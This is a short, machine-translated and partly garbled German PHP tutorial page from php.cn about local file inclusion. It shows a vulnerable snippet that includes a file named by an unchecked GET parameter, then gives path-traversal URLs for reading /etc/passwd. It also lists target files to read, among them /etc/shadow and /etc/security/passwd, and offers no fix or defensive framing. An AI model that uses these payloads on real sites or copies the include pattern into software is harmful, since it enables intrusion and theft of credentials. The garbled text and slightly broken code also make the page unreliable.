Heim > Backend-Entwicklung > PHP-Tutorial > PHP fälscht lokale Dateien, die anfälligen Code enthalten

PHP fälscht lokale Dateien, die anfälligen Code enthalten

高洛峰
Freigeben: 2023-03-01 12:56:02
Original
1246 Leute haben es durchsucht

Der Code lautet wie folgt:
$page=$_GET['page'];
include($page.'php'); 🎜>
Sie können es so verwenden
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index .php?page= ../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

Weitere Updates erhalten Mehrere Daten:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/ Gruppe
/etc /security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage